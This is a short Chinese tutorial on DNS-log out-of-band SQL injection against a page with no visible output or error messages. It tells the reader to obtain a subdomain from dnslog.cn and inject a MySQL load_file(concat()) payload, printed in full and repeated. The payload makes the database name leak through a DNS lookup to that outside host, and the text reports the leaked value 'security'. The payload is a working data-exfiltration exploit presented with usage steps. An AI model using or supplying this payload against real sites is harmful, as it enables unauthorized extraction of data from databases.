dns回显注入的使用场景
当目标无显示位也无错误回显时便可使用此方法
1、首先使用网站http://www.dnslog.cn/点击此处获取dns地址
2、将获取到的地址复制填入SQL语句中执行
注意:每次获取到的dns地址都不同,改变时替换注入语句中标红部分即可
注入语句:
id=1’ and load_file(concat("\\",(database()),".2bmfvu.dnslog.cn
\1.txt")) – -
当目标无显示位也无错误回显时便可使用此方法
注意:每次获取到的dns地址都不同,改变时替换注入语句中标红部分即可
注入语句:
id=1’ and load_file(concat("\\",(database()),".2bmfvu.dnslog.cn
\1.txt")) – -
DNSLog.cn
网站会看到回显结果为security
效果如图: